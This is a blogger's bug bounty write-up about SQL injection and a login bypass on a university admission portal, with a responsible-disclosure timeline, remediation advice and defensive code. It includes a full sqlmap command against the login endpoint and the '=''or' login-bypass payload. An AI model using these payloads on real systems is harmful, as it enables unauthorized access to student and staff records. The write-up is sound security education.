Disclaimer: This article is for educational purposes only. The techniques described should only be used on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

Hi everyone, how are you? I hope you're all doing well. This time I want to share my experience regarding bug bounty hunting, and I hope my writing can be a reference for you all.

It all started when I was looking for information about entrance exams at one of the universities, let's call it site.ac.id. During my research, I discovered two critical vulnerabilities:

  • SQL Injection
  • Bypass SQL Login

Screenshot: university admission portal with vulnerable login system

Understanding SQL Injection

SQL Injection is a technique that exploits security vulnerabilities due to the absence of proper input filtering. This allows attackers to execute malicious SQL commands that can be used to view the contents of the website's database.

This vulnerability occurs when user input is directly incorporated into SQL queries without proper sanitization or parameterization, creating opportunities for malicious code execution.

Discovery Process

While searching for admission information, I was prompted to log in to access the required details. Out of curiosity, I began searching for admin login pages and tried various methods to gain access to the administrator dashboard.

Initial Testing

I started by inputting a single quote (') into the login form to test for SQL injection vulnerabilities. This is a basic but effective technique for identifying potential security flaws.

# Test payload in login form
Username: '
Password: '

Critical Discovery: After inputting the single quote, I received an error message that clearly indicated a SQL injection vulnerability!

Error Message Analysis

The error message I received was:

Warning: mysqli_num_rows() expects parameter 1 to be mysqli_result,
boolean given in /home/site/public_html/user/cek_login.php on line 12

This error message provided valuable information:

  • Database Type: MySQL (mysqli functions)
  • File Path: /home/site/public_html/user/cek_login.php
  • Vulnerability Confirmation: Improper SQL query handling
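The warning above is what an unparameterized mysqli query emits once an injected quote breaks it, so a defender can watch the PHP error log for bursts of that warning on one script. The following Python is an added example, not part of the original article: the log lines are constructed in php error_log format around the article's warning text, and parse() and find_probe_bursts() are names chosen here.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in php error_log format; the warning text is the one the article
# received, the timestamps and the extra Notice line are made up for this example.
SAMPLE_LOG = """\
[23-Feb-2022 10:15:01 UTC] PHP Warning:  mysqli_num_rows() expects parameter 1 to be mysqli_result, boolean given in /home/site/public_html/user/cek_login.php on line 12
[23-Feb-2022 10:15:03 UTC] PHP Warning:  mysqli_num_rows() expects parameter 1 to be mysqli_result, boolean given in /home/site/public_html/user/cek_login.php on line 12
[23-Feb-2022 10:15:04 UTC] PHP Notice:  Undefined index: page in /home/site/public_html/index.php on line 40
[23-Feb-2022 10:15:06 UTC] PHP Warning:  mysqli_num_rows() expects parameter 1 to be mysqli_result, boolean given in /home/site/public_html/user/cek_login.php on line 12
[23-Feb-2022 11:40:00 UTC] PHP Warning:  mysqli_num_rows() expects parameter 1 to be mysqli_result, boolean given in /home/site/public_html/user/cek_login.php on line 12
"""

LINE_RE = re.compile(
    r"^\[(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2}) \w+\] PHP (?P<level>\w+):\s+"
    r"(?P<msg>.*) in (?P<file>\S+) on line (?P<line>\d+)$")
# A mysqli_* call receiving `boolean` instead of a result set means the query itself
# failed, which is exactly what a stray quote in an unparameterized query produces.
FAILED_QUERY_RE = re.compile(
    r"mysqli_\w+\(\) expects parameter 1 to be mysqli_result, boolean given")

def parse(log_text: str) -> list[tuple[datetime, str, str]]:
    """Return (timestamp, script path, message) for every well-formed line."""
    events = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if m:
            ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
            events.append((ts, m["file"], m["msg"]))
    return events

def find_probe_bursts(events, window=timedelta(seconds=60), threshold=3):
    """Return (script, burst start, count) for scripts that log at least `threshold`
    failed-query warnings inside one `window`; one alert per script."""
    per_file = defaultdict(list)
    for ts, file, msg in events:
        if FAILED_QUERY_RE.search(msg):
            per_file[file].append(ts)
    alerts = []
    for file, times in per_file.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                alerts.append((file, times[start], end - start + 1))
                break
    return alerts
```

The isolated warning at 11:40 is not reported; only the three failures within a minute on cek_login.php produce an alert.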

Request Analysis with Developer Tools

I analyzed the request data by examining the Network tab in Web Developer Tools (Ctrl + Shift + I). This allowed me to understand the structure of the login request and identify the parameters being sent to the server.

# HTTP POST request structure
POST /user/cek_login.php HTTP/1.1
Host: www.site.ac.id
Content-Type: application/x-www-form-urlencoded

email=test@example.com&password=password123

SQLmap Exploitation

After confirming the vulnerability, I proceeded to use SQLmap, a powerful automated SQL injection tool, to extract database information.

Screenshot: SQLmap - automated SQL injection exploitation tool

SQLmap Command Execution

sqlmap -u "https://www.site.ac.id/user/cek_login.php" \
  --data="email=a&password=a" \
  --random-agent \
  --tamper=space2comment \
  --sql-query="database()"

Let me break down this command:

  • -u: Target URL
  • --data: POST data parameters
  • --random-agent: Use random User-Agent headers
  • --tamper=space2comment: Replace spaces with SQL comments
  • --sql-query: Execute specific SQL query

Success: After waiting for some time, I successfully obtained the database name from www.site.ac.id!

SQL Login Bypass Discovery

SQL Login Bypass is a technique where attackers can input SQL characters into login forms to gain unauthorized access to admin dashboards without using legitimate credentials.

Bypass Technique

I used the classic SQL injection payload '=''or' in both the username and password fields:

# Login bypass payload
Username: '=''or'
Password: '=''or'

This payload works by manipulating the SQL query logic. The original query likely looked like:

SELECT * FROM users WHERE username='$username' AND password='$password'

With our payload, it becomes:

SELECT * FROM users WHERE username=''=''or'' AND password=''=''or''

Bypass Success: After inputting the payload, I was immediately redirected to the admin panel, confirming that the login form was vulnerable to SQL injection bypass!

Screenshot: injecting the SQL bypass payload into the login form

Screenshot: successfully bypassed login and gained admin access

Impact Assessment

The discovered vulnerabilities had severe security implications:

SQL Injection Impact

  • Data Exposure: Access to sensitive student and staff information
  • Database Manipulation: Potential to modify or delete critical data
  • System Information: Database structure and configuration details
  • Privilege Escalation: Possible access to administrative functions

Login Bypass Impact

  • Unauthorized Access: Complete admin panel access without credentials
  • Administrative Control: Full system management capabilities
  • Data Breach: Access to confidential academic records
  • System Compromise: Potential for further exploitation

Responsible Disclosure

Following ethical hacking principles, I immediately reported these critical vulnerabilities to the university through their official channels.

Timeline

📅 February 23, 2022: Sent bug report to site.ac.id
✅ February 24, 2022: University responded and validated the bugs
🏆 March 23, 2022: Received certificate of appreciation as reward

Note: The development team gave me permission to disclose this report without mentioning their specific details or identity.

Prevention and Remediation

To prevent similar vulnerabilities, organizations should implement comprehensive security measures:

SQL Injection Prevention

  • Parameterized Queries: Use prepared statements with bound parameters
  • Input Validation: Sanitize and validate all user inputs
  • Least Privilege: Database users should have minimal necessary permissions
  • Error Handling: Implement proper error handling without exposing system details

Authentication Security

  • Strong Authentication: Implement robust login mechanisms
  • Multi-Factor Authentication: Add additional security layers
  • Session Management: Secure session handling and timeout controls
  • Access Controls: Proper authorization and privilege management

Secure Code Example

// Secure PHP login code example: look the user up by username only and
// compare the submitted password against the stored hash in application code.
// $pdo is an existing PDO connection; $username and $password come from the form.
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ?");
$stmt->execute([$username]);
$user = $stmt->fetch();

// password_verify() checks the submitted password against the salted hash that
// password_hash() produced at registration; re-hashing the input with a fresh
// salt and comparing it inside the SQL query would never match.
if ($user && password_verify($password, $user['password'])) {
  // Login successful
} else {
  // Login failed
}
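As an added example (not the article's code), the same fix in Python with sqlite3, serving both the bypass explanation and the prevention section: build_query_vulnerable() reproduces the concatenated query shape reconstructed for cek_login.php, and login_safe() shows the parameterized lookup by username plus a PBKDF2 hash check in application code. The vulnerable string is only built, not executed, because SQLite's comparison rules differ from MySQL's; the table, the credential and the function names are constructed for this example.

```python
import hashlib
import hmac
import os
import sqlite3

PAYLOAD = "'=''or'"  # the bypass string from the article

def build_query_vulnerable(username: str, password: str) -> str:
    """String concatenation, the query shape the article reconstructs for cek_login.php."""
    return (f"SELECT * FROM users WHERE username='{username}' "
            f"AND password='{password}'")

def hash_password(password: str, salt: bytes = b"") -> str:
    """PBKDF2-SHA256, stored as saltHex$hashHex (stand-in for PHP's password_hash)."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt.hex() + "$" + dk.hex()

def verify_password(password: str, stored: str) -> bool:
    """Constant-time check of a password against a hash_password() string."""
    salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), 200_000)
    return hmac.compare_digest(dk.hex(), dk_hex)

DUMMY_HASH = hash_password("not-a-real-password")  # used when the username is unknown

def make_db() -> sqlite3.Connection:
    """Constructed in-memory users table with one hashed credential."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", hash_password("correct horse battery staple")))
    conn.commit()
    return conn

def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterized lookup by username only; the payload is bound as a plain string
    and can never change the query structure. The password is checked in code."""
    row = conn.execute("SELECT password FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        verify_password(password, DUMMY_HASH)  # equalize timing for unknown users
        return False
    return verify_password(password, row[0])

if __name__ == "__main__":
    print(build_query_vulnerable(PAYLOAD, PAYLOAD))
    db = make_db()
    print("admin/correct:", login_safe(db, "admin", "correct horse battery staple"))
    print("payload/payload:", login_safe(db, PAYLOAD, PAYLOAD))
```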

Tools and Techniques Used

Testing Tools

  • Browser Developer Tools: Request/response analysis
  • SQLmap: Automated SQL injection testing
  • Manual Testing: Custom payload crafting
  • Burp Suite: Web application security testing (alternative)

Testing Methodology

  • Reconnaissance: Information gathering and target analysis
  • Vulnerability Discovery: Manual and automated testing
  • Exploitation: Proof of concept development
  • Documentation: Comprehensive reporting
  • Responsible Disclosure: Ethical vulnerability reporting

Lessons Learned

This bug bounty experience taught me several valuable lessons:

  • Basic Techniques Work: Simple payloads can reveal critical vulnerabilities
  • Educational Institutions: Often have valuable systems with security gaps
  • Error Messages: Provide crucial information for exploitation
  • Responsible Disclosure: Builds trust and positive relationships
  • Documentation: Proper reporting leads to recognition and rewards

Conclusion

This successful bug bounty hunt demonstrates how curiosity and systematic testing can lead to the discovery of critical security vulnerabilities. The combination of SQL injection and authentication bypass created a severe security risk for the university's admission system.

The experience reinforced the importance of:

  • Proactive Security Testing: Regular vulnerability assessments are essential
  • Input Validation: All user inputs must be properly sanitized
  • Secure Coding Practices: Following established security guidelines
  • Error Handling: Preventing information disclosure through error messages
  • Ethical Hacking: Using skills responsibly to improve security

For aspiring bug bounty hunters, this case study shows that sometimes the most straightforward approaches yield the best results. Don't overlook basic testing techniques in favor of complex exploits – often, the simplest methods reveal the most critical vulnerabilities.

Image: continuous learning and ethical practices in cybersecurity

Maybe that's all from me, hopefully this can be a reference for you all and sorry if there are things that are not clear. I'm RyuuKhagetsu, see you in the next article.